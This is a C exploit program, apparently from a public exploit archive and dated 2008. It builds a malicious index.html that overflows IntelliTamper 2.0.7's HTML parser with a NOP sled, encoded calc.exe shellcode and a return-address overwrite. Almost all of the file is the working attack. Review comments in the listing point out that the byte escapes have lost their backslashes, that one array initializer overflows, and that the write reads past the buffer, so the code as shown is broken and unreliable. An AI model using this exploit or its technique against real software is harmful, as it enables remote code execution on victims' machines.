
# Title : IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)
# Published : 2008-07-23
# Author : r0ut3r


/*
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow

Just a C version of Guido Landi's discovery.

Written by r0ut3r (writ3r [at] gmail.com)

kit:/home/r0ut3r/public_html # gcc -o intell intell.c
kit:/home/r0ut3r/public_html # ./intell
[+] Building payload
[+] Success writing to index.html
kit:/home/r0ut3r/public_html #
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Entry point: builds one HTML anchor whose href is far longer than the
 * IntelliTamper 2.0.7 HTML parser expects and writes it to index.html in the
 * current directory.  Takes no arguments; returns EXIT_FAILURE when the file
 * cannot be opened, otherwise 0 (the fclose() result is only reported).
 *
 * NOTE(review): the byte escapes and newlines in this listing ("xdaxc3...",
 * "payloadn") look as though every backslash was lost in extraction.  As shown,
 * the initializers are plain ASCII text rather than the bytes the comments
 * describe, and the `eip` initializer is longer than its 4-byte array, so the
 * listing does not build or behave as the transcript above claims.
 */
int main(void)
{
    FILE *fp;

    /* Whole anchor: 16 (opening tag) + 464 (sled + shellcode + eip) + 11
     * (closing tag) = 491 bytes, so the buffer is filled completely and has
     * no room for a terminating NUL -- see the fprintf() note below.  The
     * "464" in the author's comment appears to be that middle part. */
    char payload[491]; /* 464 */

    /* calc.exe shellcode x86/alpha_mixed succeeded, final size 344 */
    /* Alphanumeric-encoded payload; per the comment above it launches
     * calc.exe.  With the escapes intact sizeof(shellcode) is 345: the 344
     * bytes plus the literal's implicit NUL. */
    unsigned char shellcode[] =
        "xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a"
        "x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58"
        "x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
        "x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c"
        "x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47"
        "x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b"
        "x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50"
        "x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50"
        "x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49"
        "x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44"
        "x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45"
        "x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f"
        "x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a"
        "x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31"
        "x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c"
        "x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b"
        "x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50"
        "x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58"
        "x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46"
        "x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57"
        "x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42"
        "x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43"
        "x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41";

    /* Value that overwrites the saved return address (hence the name).
     * With the escapes intact the literal is exactly 4 bytes and C drops the
     * terminating NUL that would not fit; the 12-character text shown here
     * does not fit at all. */
    char eip[4] = "x23x44x06x7d";

    /* Opening and closing tag fragments, deliberately sized without a NUL
     * (16 and 11 characters) so memcpy() can concatenate them below. */
    char html[16] = "<a href='http://";
    char chtml[11] = "'>yahhh</a>";

    /* Binary mode so no byte of the payload is translated on write. */
    fp = fopen("index.html", "wb");
    if (fp == NULL)
    {
        perror("Failed opening index.htmln");
        return EXIT_FAILURE;
    }

    /* Layout of payload by byte offset:
     *   [0,16)    opening tag
     *   [16,132)  116 bytes of 0x90 (x86 NOP), the sled
     *   [132,477) shellcode including its trailing NUL (sizeof copies it)
     *   [476,480) eip, placed one byte back so it overwrites that NUL
     *   [480,491) closing tag -- exactly the end of the array */
    printf("[+] Building payloadn");
    memcpy(payload, html, sizeof(html));
    memset(payload+sizeof(html), 0x90, 116);
    memcpy(payload+sizeof(html)+116, shellcode, sizeof(shellcode));
    memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1, eip, sizeof(eip));
    memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1+sizeof(eip), chtml, sizeof(chtml));

    /* NOTE(review): "%s" reads until the first NUL, and none is stored within
     * payload's 491 bytes, so this reads past the array (undefined behaviour)
     * and copies whatever follows on the stack until a NUL happens to appear.
     * fwrite(payload, 1, sizeof payload, fp) would write exactly the buffer. */
    fprintf(fp, "%s", payload);
    /* fclose() flushes; a non-zero result means the data may not have hit disk. */
    if (fclose(fp) == 0)
        printf("[+] Success writing to index.htmln");
    else
        printf("[-] Failed writing to index.htmln");

    return 0;
}
